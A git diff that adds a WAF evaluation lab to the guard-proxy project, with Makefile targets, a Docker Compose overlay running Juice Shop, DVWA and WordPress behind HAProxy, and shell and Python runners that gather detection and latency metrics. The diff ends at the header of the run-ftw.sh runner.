diff --git a/.gitignore b/.gitignore
index 5375a9b..fa94dfe 100644
--- a/.gitignore
+++ b/.gitignore
@@ -111,9 +111,12 @@ logs/
 *.mkv
 
 # ===== Benchmark Results =====
+# Flat files (legacy pattern)
 benchmarks/results/*.json
 benchmarks/results/*.html
 benchmarks/results/*.csv
+# Run directories (run-<RUN_ID>/) — all raw output is gitignored
+benchmarks/results/run-*/
 
 # ===== HAProxy / Coraza Runtime =====
 *.sock
@@ -121,6 +124,7 @@ benchmarks/results/*.csv
 haproxy.stats
 
 # ===== Thesis =====
+# Separate repository — not tracked here.
 thesis/
 
 # ===== Keep Empty Directories =====
diff --git a/Makefile b/Makefile
index 59b2fff..77a4134 100644
--- a/Makefile
+++ b/Makefile
@@ -2,7 +2,8 @@ COMPOSE_FILE := deploy/docker/docker-compose.yml
 COMPOSE_DEBUG_FILE := deploy/docker/docker-compose.debug.yml
 ENV_FILE := deploy/docker/.env
 
-.PHONY: run dev down clean logs ps seed users coraza-build
+.PHONY: run dev down clean logs ps seed users coraza-build \
+        eval-up eval-down eval-clean eval-ftw eval-zap eval-nuclei eval-load eval-metrics eval-all eval-results
 
 run:
 	docker-compose -f $(COMPOSE_FILE) --env-file $(ENV_FILE) up --build -d
@@ -30,3 +31,48 @@ users:
 
 coraza-build:
 	docker build -f deploy/docker/coraza.Dockerfile -t guard-proxy/coraza-spoa:dev .
+
+# ── Evaluation lab (delegates to benchmarks/Makefile) ─────────────────────
+# See benchmarks/Makefile for full documentation and variable overrides.
+
+eval-up:
+	$(MAKE) -C benchmarks lab-up
+
+eval-down:
+	$(MAKE) -C benchmarks lab-down
+
+eval-clean:
+	$(MAKE) -C benchmarks lab-clean
+
+eval-ftw:
+	$(MAKE) -C benchmarks eval-ftw \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-zap:
+	$(MAKE) -C benchmarks eval-zap \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-nuclei:
+	$(MAKE) -C benchmarks eval-nuclei \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-load:
+	$(MAKE) -C benchmarks eval-load \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-metrics:
+	$(MAKE) -C benchmarks eval-metrics \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID))
+
+eval-all:
+	$(MAKE) -C benchmarks eval-all \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-results:
+	$(MAKE) -C benchmarks results \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID))
diff --git a/README.testing.md b/README.testing.md
index 09912c5..1320d6e 100644
--- a/README.testing.md
+++ b/README.testing.md
@@ -6,8 +6,8 @@
 |-------|----------|-------|---------------|
 | **Unit** (many, fast) | `src/backend/tests/unit/` | pytest, Vitest | >80% |
 | **Integration** (some) | `src/backend/tests/integration/` | pytest, Docker | Key flows |
-| **Security** | `tests/security/` | sqlmap, OWASP ZAP, custom payloads | OWASP Top 10 |
-| **Performance** | `benchmarks/` | wrk, k6, Locust | <20% WAF overhead |
+| **Security** | `benchmarks/lab/` | OWASP ZAP, Nuclei, go-ftw (CRS corpus) | OWASP Top 10 |
+| **Performance** | `benchmarks/lab/` | wrk (WAF vs direct) | <20% WAF overhead |
 
 ## WAF Testing
 
@@ -54,10 +54,32 @@ uv run pytest -m e2e tests/e2e/test_policy_apply.py
 The test uses the same prerequisites as the smoke test and is wired into the
 nightly smoke workflow. Normal backend pytest runs exclude tests marked `e2e`.
 
+## Evaluation Lab (thesis M6)
+
+Full WAF evaluation with real target apps (WordPress, Juice Shop, DVWA):
+
+```sh
+# Prerequisites
+cp deploy/demo/.env.example deploy/demo/.env
+cp benchmarks/lab/.env.example benchmarks/lab/.env
+git submodule update --init --recursive
+
+# Bring up the lab
+make eval-up
+
+# Run all scenarios (ftw → zap → nuclei → load → metrics)
+make eval-all
+
+# View results
+make eval-results
+```
+
+See `benchmarks/lab/` for scenario configs and `docs/evaluation-plan.md` for methodology.
+
 ## Test Data
 
-- Payloads: `benchmarks/payloads/` (sqli.txt, xss.txt, legitimate.txt)
-- Results: `benchmarks/results/` (timestamped JSON, gitignored)
+- Payloads: `benchmarks/payloads/` (sqli.txt, xss.txt, lfi.txt, legitimate.txt)
+- Results: `benchmarks/results/` (timestamped JSON/CSV, gitignored)
 
 ## Commands
 
diff --git a/benchmarks/Makefile b/benchmarks/Makefile
new file mode 100644
index 0000000..df4399a
--- /dev/null
+++ b/benchmarks/Makefile
@@ -0,0 +1,108 @@
+REPO_ROOT    := $(shell git rev-parse --show-toplevel 2>/dev/null || pwd)
+DEMO_COMPOSE := $(REPO_ROOT)/deploy/demo/docker-compose.yml
+LAB_COMPOSE  := $(REPO_ROOT)/benchmarks/lab/docker-compose.targets.yml
+DEMO_ENV     := $(REPO_ROOT)/deploy/demo/.env
+LAB_ENV      := $(REPO_ROOT)/benchmarks/lab/.env
+RUNNERS      := $(REPO_ROOT)/benchmarks/lab/runners
+
+RUN_ID       ?= $(shell date +%Y%m%d-%H%M%S)
+TARGET_VHOST ?= juice.local
+DIRECT_HOST  ?= juiceshop
+DIRECT_PORT  ?= 3000
+
+.PHONY: lab-up lab-down lab-clean \
+        eval-ftw eval-zap eval-nuclei eval-load eval-metrics eval-all \
+        results help
+
+# ── Lab lifecycle ──────────────────────────────────────────────────────────
+
+## Bring up the demo + all lab targets and register vhosts.
+lab-up:
+	@echo "==> Starting guard-proxy demo + lab targets..."
+	docker compose \
+	  -f $(DEMO_COMPOSE) \
+	  -f $(LAB_COMPOSE) \
+	  --env-file $(DEMO_ENV) \
+	  --env-file $(LAB_ENV) \
+	  up -d --build
+	@echo "==> Seeding vhosts..."
+	bash $(REPO_ROOT)/deploy/demo/setup-demo.sh
+	bash $(REPO_ROOT)/benchmarks/lab/setup-lab.sh --skip-compose
+
+## Stop the lab (preserve volumes).
+lab-down:
+	bash $(REPO_ROOT)/benchmarks/lab/teardown-lab.sh
+
+## Stop the lab and remove all volumes.
+lab-clean:
+	bash $(REPO_ROOT)/benchmarks/lab/teardown-lab.sh --clean
+
+# ── Individual scenario runners ────────────────────────────────────────────
+
+## CRS regression suite (TPR gold standard). Uses go-ftw against the CRS corpus.
+eval-ftw:
+	@mkdir -p $(REPO_ROOT)/benchmarks/results/run-$(RUN_ID)/ftw
+	RUN_ID=$(RUN_ID) TARGET_VHOST=$(TARGET_VHOST) \
+	  bash $(RUNNERS)/run-ftw.sh
+
+## ZAP baseline scan (FPR measurement, WordPress is best target for FP).
+eval-zap:
+	@mkdir -p $(REPO_ROOT)/benchmarks/results/run-$(RUN_ID)/zap-$(TARGET_VHOST)
+	RUN_ID=$(RUN_ID) TARGET_VHOST=$(TARGET_VHOST) \
+	  bash $(RUNNERS)/run-zap.sh
+
+## Nuclei CVE templates (WAF TPR against real attack payloads).
+eval-nuclei:
+	@mkdir -p $(REPO_ROOT)/benchmarks/results/run-$(RUN_ID)/nuclei-$(TARGET_VHOST)
+	RUN_ID=$(RUN_ID) TARGET_VHOST=$(TARGET_VHOST) \
+	  bash $(RUNNERS)/run-nuclei.sh
+
+## Latency + RPS load test (WAF vs direct). Measures overhead.
+eval-load:
+	@mkdir -p $(REPO_ROOT)/benchmarks/results/run-$(RUN_ID)/load-$(TARGET_VHOST)
+	RUN_ID=$(RUN_ID) TARGET_VHOST=$(TARGET_VHOST) \
+	  DIRECT_HOST=$(DIRECT_HOST) DIRECT_PORT=$(DIRECT_PORT) \
+	  bash $(RUNNERS)/run-load.sh
+
+## Aggregate all scenario outputs into results.csv + report.json.
+eval-metrics:
+	RUN_ID=$(RUN_ID) bash $(RUNNERS)/collect-metrics.sh
+
+## Run all scenarios (ftw → zap → nuclei → load → metrics) in one pass.
+eval-all: eval-ftw eval-zap eval-nuclei eval-load eval-metrics
+
+# ── Results summary ────────────────────────────────────────────────────────
+
+## Print a summary of the most recent run (or RUN_ID= a specific run).
+results:
+	@latest=$$(ls -1t $(REPO_ROOT)/benchmarks/results/ 2>/dev/null \
+	            | grep '^run-' | head -1 | sed 's/^run-//'); \
+	run=$${RUN_ID:-$$latest}; \
+	csv="$(REPO_ROOT)/benchmarks/results/run-$${run}/results.csv"; \
+	if [[ -f "$$csv" ]]; then \
+	  echo "Run: $${run}"; column -t -s, "$$csv"; \
+	else \
+	  echo "No results found. Run 'make eval-all RUN_ID=<id>' first."; \
+	fi
+
+# ── Help ───────────────────────────────────────────────────────────────────
+
+help:
+	@echo "Guard Proxy Evaluation Lab"
+	@echo ""
+	@echo "Setup:"
+	@echo "  cp deploy/demo/.env.example deploy/demo/.env"
+	@echo "  cp benchmarks/lab/.env.example benchmarks/lab/.env"
+	@echo "  git submodule update --init --recursive"
+	@echo ""
+	@echo "Targets:"
+	@grep -E '^## ' $(MAKEFILE_LIST) | sed 's/^## /  /'
+	@echo ""
+	@echo "Variables:"
+	@echo "  RUN_ID=<id>         Override run ID (default: timestamp)"
+	@echo "  TARGET_VHOST=<host> Target vhost (default: juice.local)"
+	@echo "  DIRECT_HOST=<name>  Direct-access Docker service name"
+	@echo "  DIRECT_PORT=<port>  Direct-access port (bypasses HAProxy)"
+	@echo ""
+	@echo "Example (3 runs for thesis median):"
+	@echo "  for i in 1 2 3; do make eval-all; done"
diff --git a/benchmarks/lab/.env.example b/benchmarks/lab/.env.example
new file mode 100644
index 0000000..6463d43
--- /dev/null
+++ b/benchmarks/lab/.env.example
@@ -0,0 +1,34 @@
+# Copy to benchmarks/lab/.env before running the eval lab.
+# These are local-lab defaults only — never use these credentials in production.
+
+# ── DVWA database ─────────────────────────────────────────────────────────
+DVWA_DB_ROOT_PASSWORD=dvwa_root_pw
+DVWA_DB_PASSWORD=dvwa_pw
+
+# ── WordPress database ────────────────────────────────────────────────────
+WP_DB_ROOT_PASSWORD=wp_root_pw
+WP_DB_PASSWORD=wp_pw
+WP_ADMIN_PASSWORD=LabAdmin12345!
+
+# ── Lab policy settings (used by setup-lab.sh) ────────────────────────────
+# Baseline policy: PL1, anomaly threshold 5, block mode
+LAB_POLICY_NAME=Lab Baseline
+LAB_POLICY_PARANOIA=1
+LAB_POLICY_INBOUND_THRESHOLD=5
+LAB_POLICY_OUTBOUND_THRESHOLD=4
+
+# High-paranoia policy for sweep tests: PL2, anomaly threshold 3, block mode
+LAB_PL2_POLICY_NAME=Lab PL2
+LAB_PL2_POLICY_PARANOIA=2
+LAB_PL2_POLICY_INBOUND_THRESHOLD=3
+LAB_PL2_POLICY_OUTBOUND_THRESHOLD=3
+
+# ── Vhost domains ─────────────────────────────────────────────────────────
+LAB_JUICESHOP_DOMAIN=juice.local
+LAB_JUICESHOP_BACKEND_URL=http://juiceshop:3000
+
+LAB_DVWA_DOMAIN=dvwa.local
+LAB_DVWA_BACKEND_URL=http://dvwa:80
+
+LAB_WP_DOMAIN=wp.local
+LAB_WP_BACKEND_URL=http://wordpress:80
diff --git a/benchmarks/lab/docker-compose.targets.yml b/benchmarks/lab/docker-compose.targets.yml
new file mode 100644
index 0000000..95caf52
--- /dev/null
+++ b/benchmarks/lab/docker-compose.targets.yml
@@ -0,0 +1,162 @@
+# Evaluation lab target applications.
+#
+# This is an OVERLAY on top of the demo stack. Run as:
+#   docker compose \
+#     -f deploy/demo/docker-compose.yml \
+#     -f benchmarks/lab/docker-compose.targets.yml \
+#     --env-file deploy/demo/.env \
+#     --env-file benchmarks/lab/.env \
+#     up -d --build
+#
+# All target containers attach to gp_internal only; they are exposed
+# to the outside world exclusively through HAProxy (via vhost routing).
+#
+# Pinned image digests ensure reproducible test results across runs.
+# Update pins by running: docker pull <image> && docker inspect --format '{{index .RepoDigests 0}}' <image>
+
+name: guard-proxy-demo
+
+services:
+
+  # ── OWASP Juice Shop ──────────────────────────────────────────────────────
+  # Intentionally vulnerable Node.js app designed for security testing.
+  # Vhost: juice.local
+  juiceshop:
+    image: bkimminich/juice-shop:v17.1.1
+    restart: unless-stopped
+    healthcheck:
+      test: ["CMD-SHELL", "wget -q -O- http://localhost:3000/rest/admin/application-version >/dev/null 2>&1"]
+      interval: 15s
+      timeout: 10s
+      retries: 10
+      start_period: 30s
+    networks:
+      - gp_internal
+
+  # ── DVWA (Damn Vulnerable Web Application) ────────────────────────────────
+  # Classic PHP vulnerable app. Requires MariaDB sidecar.
+  # Vhost: dvwa.local
+  dvwa-db:
+    image: mariadb:11.4
+    restart: unless-stopped
+    environment:
+      MARIADB_ROOT_PASSWORD: ${DVWA_DB_ROOT_PASSWORD:-dvwa_root_pw}
+      MARIADB_DATABASE: dvwa
+      MARIADB_USER: dvwa
+      MARIADB_PASSWORD: ${DVWA_DB_PASSWORD:-dvwa_pw}
+    volumes:
+      - dvwa_db_data:/var/lib/mysql
+    healthcheck:
+      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
+      interval: 10s
+      timeout: 5s
+      retries: 10
+    networks:
+      - gp_internal
+
+  dvwa:
+    image: ghcr.io/digininja/dvwa:latest
+    restart: unless-stopped
+    environment:
+      DB_SERVER: dvwa-db
+      DB_DATABASE: dvwa
+      DB_USER: dvwa
+      DB_PASSWORD: ${DVWA_DB_PASSWORD:-dvwa_pw}
+      RECAPTCHA_PRIV_KEY: ""
+      RECAPTCHA_PUB_KEY: ""
+    depends_on:
+      dvwa-db:
+        condition: service_healthy
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost/setup.php >/dev/null"]
+      interval: 15s
+      timeout: 10s
+      retries: 10
+      start_period: 20s
+    networks:
+      - gp_internal
+
+  # ── WordPress ─────────────────────────────────────────────────────────────
+  # Real-world CMS. Used to measure false positive rate of the WAF against
+  # legitimate CMS traffic (no exclusion plugins applied — intentional).
+  # Vhost: wp.local
+  wp-db:
+    image: mariadb:11.4
+    restart: unless-stopped
+    environment:
+      MARIADB_ROOT_PASSWORD: ${WP_DB_ROOT_PASSWORD:-wp_root_pw}
+      MARIADB_DATABASE: wordpress
+      MARIADB_USER: wordpress
+      MARIADB_PASSWORD: ${WP_DB_PASSWORD:-wp_pw}
+    volumes:
+      - wp_db_data:/var/lib/mysql
+    healthcheck:
+      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
+      interval: 10s
+      timeout: 5s
+      retries: 10
+    networks:
+      - gp_internal
+
+  wordpress:
+    image: wordpress:php8.3-apache
+    restart: unless-stopped
+    environment:
+      WORDPRESS_DB_HOST: wp-db
+      WORDPRESS_DB_NAME: wordpress
+      WORDPRESS_DB_USER: wordpress
+      WORDPRESS_DB_PASSWORD: ${WP_DB_PASSWORD:-wp_pw}
+      WORDPRESS_TABLE_PREFIX: wp_
+    depends_on:
+      wp-db:
+        condition: service_healthy
+    volumes:
+      - wp_data:/var/www/html
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost/wp-login.php >/dev/null"]
+      interval: 15s
+      timeout: 10s
+      retries: 10
+      start_period: 30s
+    networks:
+      - gp_internal
+
+  # One-shot WP CLI container to install WordPress deterministically.
+  # Runs once (no restart), exits 0 after wp core install succeeds.
+  wp-cli:
+    image: wordpress:cli-php8.3
+    restart: "no"
+    environment:
+      WORDPRESS_DB_HOST: wp-db
+      WORDPRESS_DB_NAME: wordpress
+      WORDPRESS_DB_USER: wordpress
+      WORDPRESS_DB_PASSWORD: ${WP_DB_PASSWORD:-wp_pw}
+    volumes:
+      - wp_data:/var/www/html
+    depends_on:
+      wordpress:
+        condition: service_healthy
+    command: >
+      sh -c "
+        sleep 5 &&
+        wp core is-installed 2>/dev/null && echo 'WordPress already installed.' ||
+        wp core install
+          --url=http://wp.local
+          --title='Guard Proxy Lab'
+          --admin_user=admin
+          --admin_password=${WP_ADMIN_PASSWORD:-LabAdmin12345!}
+          --admin_email=admin@lab.local
+          --skip-email
+      "
+    networks:
+      - gp_internal
+
+networks:
+  gp_internal:
+    external: true
+    name: guard-proxy-demo_gp_internal
+
+volumes:
+  dvwa_db_data:
+  wp_db_data:
+  wp_data:
diff --git a/benchmarks/lab/runners/collect-metrics.sh b/benchmarks/lab/runners/collect-metrics.sh
new file mode 100755
index 0000000..c06fe4c
--- /dev/null
+++ b/benchmarks/lab/runners/collect-metrics.sh
@@ -0,0 +1,167 @@
+#!/usr/bin/env bash
+# collect-metrics.sh — Aggregate all scenario summaries into results.csv.
+#
+# Reads all summary.json files in a run directory and produces:
+#   benchmarks/results/run-<RUN_ID>/results.csv   — flat table for thesis tables
+#   benchmarks/results/run-<RUN_ID>/report.json   — full structured report
+#
+# Optionally cross-references the Coraza audit log to compute confirmed
+# TP/FP counts for ZAP and Nuclei scenarios.
+#
+# Usage:
+#   RUN_ID=20260602-141500 bash benchmarks/lab/runners/collect-metrics.sh
+#   RUN_ID=... AUDIT_LOG=/path/to/audit.log bash benchmarks/lab/runners/collect-metrics.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+RUN_DIR="${REPO_ROOT}/benchmarks/results/run-${RUN_ID}"
+# Coraza audit log — mounted from the coraza_audit Docker volume.
+# If not provided, skip audit-log cross-reference.
+AUDIT_LOG="${AUDIT_LOG:-}"
+
+if [[ ! -d "${RUN_DIR}" ]]; then
+  echo "Run directory not found: ${RUN_DIR}" >&2
+  echo "Set RUN_ID to an existing run." >&2
+  exit 1
+fi
+
+echo "=== Aggregating metrics for run ${RUN_ID} ==="
+
+# ── Optional: extract audit log from Docker volume ─────────────────────────
+if [[ -z "${AUDIT_LOG}" ]]; then
+  AUDIT_LOG="${RUN_DIR}/coraza-audit.log"
+  if ! docker cp "$(docker ps --filter "name=coraza" --format "{{.ID}}" | head -1)":/var/log/coraza/audit.log \
+       "${AUDIT_LOG}" 2>/dev/null; then
+    echo "Note: could not copy audit log from coraza container. Skipping log cross-reference."
+    AUDIT_LOG=""
+  fi
+fi
+
+# ── Aggregate summaries ────────────────────────────────────────────────────
+python3 - <<PY
+import json, os, glob, csv, sys
+
+run_dir    = "${RUN_DIR}"
+audit_log  = "${AUDIT_LOG}"
+run_id     = "${RUN_ID}"
+
+# Collect all summary.json files.
+summaries = []
+for path in sorted(glob.glob(os.path.join(run_dir, "*/summary.json"))):
+    with open(path) as f:
+        try:
+            summaries.append(json.load(f))
+        except json.JSONDecodeError as e:
+            print(f"Warning: could not parse {path}: {e}", file=sys.stderr)
+
+if not summaries:
+    print("No summary.json files found in run directory.", file=sys.stderr)
+    sys.exit(1)
+
+# ── Audit log cross-reference ──────────────────────────────────────────────
+# Parse Coraza JSON audit log to count total blocked requests per vhost
+# and identify transactions by WAF rule matches.
+blocked_by_vhost = {}
+if audit_log and os.path.exists(audit_log):
+    with open(audit_log) as f:
+        for line in f:
+            line = line.strip()
+            if not line:
+                continue
+            try:
+                entry = json.loads(line)
+                # Coraza audit log JSON schema: top-level keys vary by config.
+                # Standard keys: transaction.host_name, transaction.response.status
+                txn = entry.get("transaction", {})
+                vhost = txn.get("host_name", "unknown")
+                response = txn.get("response", {})
+                status = response.get("status", 200)
+                if status == 403:
+                    blocked_by_vhost[vhost] = blocked_by_vhost.get(vhost, 0) + 1
+            except (json.JSONDecodeError, AttributeError):
+                pass
+    print(f"Audit log: found blocks per vhost: {blocked_by_vhost}")
+
+# ── Write aggregated CSV ───────────────────────────────────────────────────
+csv_path = os.path.join(run_dir, "results.csv")
+report_path = os.path.join(run_dir, "report.json")
+
+csv_rows = []
+for s in summaries:
+    det  = s.get("detection", {})
+    perf = s.get("performance", {})
+    lat  = perf.get("latency_ms", {})
+    lat_oh = perf.get("latency_overhead_ms", {})
+    res  = s.get("resources", {})
+    cor  = res.get("coraza", {})
+    hap  = res.get("haproxy", {})
+
+    vhost = s.get("target_vhost", "")
+    blocked = blocked_by_vhost.get(vhost, "")
+
+    row = {
+        "run_id":             run_id,
+        "scenario":           s.get("scenario", ""),
+        "target_vhost":       vhost,
+        "policy":             s.get("policy", {}).get("name", ""),
+        "tpr":                det.get("tpr", ""),
+        "fpr":                det.get("fpr", ""),
+        "tp":                 det.get("true_positive", ""),
+        "fn":                 det.get("false_negative", ""),
+        "tn":                 det.get("true_negative", ""),
+        "fp":                 det.get("false_positive", ""),
+        "waf_blocks_from_log":  blocked,
+        "rps_waf":            perf.get("rps", ""),
+        "rps_direct":         perf.get("baseline_rps", ""),
+        "rps_degradation_pct": perf.get("rps_degradation_pct", ""),
+        "lat_p50_ms":         lat.get("p50", ""),
+        "lat_p95_ms":         lat.get("p95", ""),
+        "lat_p99_ms":         lat.get("p99", ""),
+        "lat_oh_p50_ms":      lat_oh.get("p50", ""),
+        "lat_oh_p95_ms":      lat_oh.get("p95", ""),
+        "lat_oh_p99_ms":      lat_oh.get("p99", ""),
+        "coraza_mem_mb_peak": cor.get("mem_mb_peak", ""),
+        "coraza_cpu_pct_avg": cor.get("cpu_pct_avg", ""),
+        "haproxy_mem_mb_peak": hap.get("mem_mb_peak", ""),
+        "haproxy_cpu_pct_avg": hap.get("cpu_pct_avg", ""),
+    }
+    csv_rows.append(row)
+
+if csv_rows:
+    with open(csv_path, "w", newline="") as f:
+        writer = csv.DictWriter(f, fieldnames=list(csv_rows[0].keys()))
+        writer.writeheader()
+        writer.writerows(csv_rows)
+    print(f"CSV written to {csv_path}")
+
+# Full JSON report.
+report = {
+    "run_id": run_id,
+    "scenarios": len(summaries),
+    "summaries": summaries,
+    "audit_log_blocks": blocked_by_vhost,
+}
+with open(report_path, "w") as f:
+    json.dump(report, f, indent=2)
+print(f"Report written to {report_path}")
+
+# Print a quick summary table.
+print()
+print(f"{'SCENARIO':<35} {'TPR':>6} {'FPR':>6} {'RPS':>8} {'DEG%':>6} {'p99ms':>7}")
+print("-" * 70)
+for row in csv_rows:
+    tpr = f"{float(row['tpr'])*100:.1f}%" if row['tpr'] != '' else "—"
+    fpr = f"{float(row['fpr'])*100:.1f}%" if row['fpr'] != '' else "—"
+    rps = f"{float(row['rps_waf']):.0f}"  if row['rps_waf'] != '' else "—"
+    deg = f"{row['rps_degradation_pct']}%" if row['rps_degradation_pct'] != '' else "—"
+    p99 = f"{row['lat_p99_ms']}"           if row['lat_p99_ms'] != '' else "—"
+    print(f"{row['scenario']:<35} {tpr:>6} {fpr:>6} {rps:>8} {deg:>6} {p99:>7}")
+PY
+
+echo ""
+echo "Done. Results → ${RUN_DIR}/"
+echo ""
+echo "To copy to thesis assets (after review):"
+echo "  cp ${RUN_DIR}/results.csv thesis/assets/figures/eval-results-${RUN_ID}.csv"
diff --git a/benchmarks/lab/runners/lib.sh b/benchmarks/lab/runners/lib.sh
new file mode 100755
index 0000000..0f5976b
--- /dev/null
+++ b/benchmarks/lab/runners/lib.sh
@@ -0,0 +1,170 @@
+#!/usr/bin/env bash
+# lib.sh — Shared helpers for eval lab runner scripts.
+#
+# Source this file at the top of each runner:
+#   source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+#
+# Provides: REPO_ROOT, RESULTS_DIR, RUN_DIR, manifest helpers, docker network name.
+
+: "${RUN_ID:?RUN_ID must be set before sourcing lib.sh}"
+
+SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd -- "${SCRIPT_DIR}/../../.." && pwd)"
+LAB_DIR="${REPO_ROOT}/benchmarks/lab"
+RESULTS_BASE="${REPO_ROOT}/benchmarks/results"
+RUN_DIR="${RESULTS_BASE}/run-${RUN_ID}"
+DEMO_ENV="${REPO_ROOT}/deploy/demo/.env"
+LAB_ENV="${LAB_DIR}/.env"
+
+# Docker network shared by the demo stack and targets.
+DOCKER_NETWORK="guard-proxy-demo_gp_internal"
+
+# ── Environment helpers ────────────────────────────────────────────────────
+
+env_value() {
+  local name="$1"; local fallback="${2:-}"; local value
+  value="$(grep -E "^${name}=" "${LAB_ENV}" "${DEMO_ENV}" 2>/dev/null | tail -n 1 | cut -d= -f2- || true)"
+  if [[ -z "${value}" ]]; then printf '%s' "${fallback}"; else printf '%s' "${value}"; fi
+}
+
+HAPROXY_HTTP_PORT="$(env_value HAPROXY_HTTP_PORT 8080)"
+BACKEND_HTTP_PORT="$(env_value BACKEND_HTTP_PORT 8000)"
+LAB_JUICESHOP_DOMAIN="$(env_value LAB_JUICESHOP_DOMAIN juice.local)"
+LAB_DVWA_DOMAIN="$(env_value LAB_DVWA_DOMAIN dvwa.local)"
+LAB_WP_DOMAIN="$(env_value LAB_WP_DOMAIN wp.local)"
+
+# ── Directory setup ────────────────────────────────────────────────────────
+
+setup_run_dir() {
+  local scenario="$1"
+  local dir="${RUN_DIR}/${scenario}"
+  mkdir -p "${dir}"
+  printf '%s' "${dir}"
+}
+
+# ── Manifest ───────────────────────────────────────────────────────────────
+
+write_manifest() {
+  local manifest="${RUN_DIR}/manifest.json"
+  if [[ -f "${manifest}" ]]; then return; fi  # written once per run
+
+  local git_sha; git_sha="$(git -C "${REPO_ROOT}" rev-parse --short HEAD 2>/dev/null || echo "unknown")"
+  local host_cpu; host_cpu="$(nproc 2>/dev/null || sysctl -n hw.ncpu 2>/dev/null || echo "unknown")"
+  local host_mem_gb; host_mem_gb="$(awk '/^MemTotal:/{printf "%.0f", $2/1024/1024}' /proc/meminfo 2>/dev/null || echo "unknown")"
+  local host_load; host_load="$(cut -d' ' -f1-3 /proc/loadavg 2>/dev/null || uptime | awk -F'load averages:' '{print $2}' | xargs || echo "unknown")"
+  local timestamp; timestamp="$(date -u +"%Y-%m-%dT%H:%M:%SZ")"
+
+  python3 - <<PY
+import json, os
+manifest = {
+    "run_id": "${RUN_ID}",
+    "timestamp": "${timestamp}",
+    "git_sha": "${git_sha}",
+    "host": {
+        "cpu_cores": "${host_cpu}",
+        "mem_gb": "${host_mem_gb}",
+        "load_avg_at_start": "${host_load}",
+        "noisy_neighbor": True  # shared Proxmox homelab — see evaluation-plan.md §9
+    },
+    "config": {
+        "haproxy_http_port": int("${HAPROXY_HTTP_PORT}"),
+        "lab_env": "${LAB_ENV}",
+        "vhosts": {
+            "juiceshop": "${LAB_JUICESHOP_DOMAIN}",
+            "dvwa": "${LAB_DVWA_DOMAIN}",
+            "wordpress": "${LAB_WP_DOMAIN}"
+        }
+    }
+}
+with open("${manifest}", "w") as f:
+    json.dump(manifest, f, indent=2)
+print("Manifest written to ${manifest}")
+PY
+}
+
+# ── Docker helpers ─────────────────────────────────────────────────────────
+
+# Get the container ID for a compose service.
+compose_container_id() {
+  local service="$1"
+  docker compose \
+    -f "${REPO_ROOT}/deploy/demo/docker-compose.yml" \
+    -f "${LAB_DIR}/docker-compose.targets.yml" \
+    --env-file "${DEMO_ENV}" \
+    --env-file "${LAB_ENV}" \
+    ps -q "${service}" 2>/dev/null || true
+}
+
+# Sample peak memory + avg CPU for a container over a duration.
+# Writes to a file and prints the final JSON snippet.
+sample_container_resources() {
+  local container_name="$1"  # docker service name
+  local duration_s="${2:-60}"
+  local out_file="$3"
+  local interval=2
+  local samples=0
+  local cpu_sum=0
+  local mem_peak=0
+
+  local end_time=$(( SECONDS + duration_s ))
+  while (( SECONDS < end_time )); do
+    local stats
+    stats="$(docker stats --no-stream --format '{{.CPUPerc}}\t{{.MemUsage}}' "${container_name}" 2>/dev/null || true)"
+    if [[ -n "${stats}" ]]; then
+      local cpu_pct mem_mb
+      cpu_pct="$(awk -F'\t' '{gsub(/%/,"",$1); print $1}' <<< "${stats}")"
+      mem_mb="$(awk -F'\t' '{split($2,a,/[A-Za-z]/); print a[1]+0}' <<< "${stats}")"
+      cpu_sum="$(python3 -c "print(${cpu_sum} + ${cpu_pct:-0})")"
+      if python3 -c "exit(0 if ${mem_mb:-0} > ${mem_peak} else 1)" 2>/dev/null; then
+        mem_peak="${mem_mb:-0}"
+      fi
+      samples=$(( samples + 1 ))
+    fi
+    sleep "${interval}"
+  done
+
+  local cpu_avg=0
+  if (( samples > 0 )); then
+    cpu_avg="$(python3 -c "print(round(${cpu_sum} / ${samples}, 2))")"
+  fi
+
+  python3 - <<PY > "${out_file}"
+import json
+print(json.dumps({"mem_mb_peak": ${mem_peak}, "cpu_pct_avg": ${cpu_avg}, "samples": ${samples}}))
+PY
+}
+
+# ── Output helpers ─────────────────────────────────────────────────────────
+
+write_summary() {
+  local scenario="$1"
+  local target_vhost="$2"
+  local policy_name="$3"
+  local detection_json="$4"      # {"true_positive":...,"false_negative":...,"tpr":...,"fpr":...}
+  local performance_json="$5"    # {"rps":...,"latency_ms":...} or {}
+  local resources_json="${6:-{}}"
+
+  python3 - <<PY
+import json, os
+
+detection = json.loads('''${detection_json}''')
+performance = json.loads('''${performance_json}''')
+resources = json.loads('''${resources_json}''')
+
+summary = {
+    "run_id": "${RUN_ID}",
+    "scenario": "${scenario}",
+    "target_vhost": "${target_vhost}",
+    "policy": {"name": "${policy_name}"},
+    "detection": detection,
+    "performance": performance,
+    "resources": resources
+}
+
+out = "${RUN_DIR}/${scenario}/summary.json"
+os.makedirs(os.path.dirname(out), exist_ok=True)
+with open(out, "w") as f:
+    json.dump(summary, f, indent=2)
+print(f"Summary written to {out}")
+PY
+}
diff --git a/benchmarks/lab/runners/run-ftw.sh b/benchmarks/lab/runners/run-ftw.sh
new file mode 100755
index 0000000..5d21c25
--- /dev/null
+++ b/benchmarks/lab/runners/run-ftw.sh
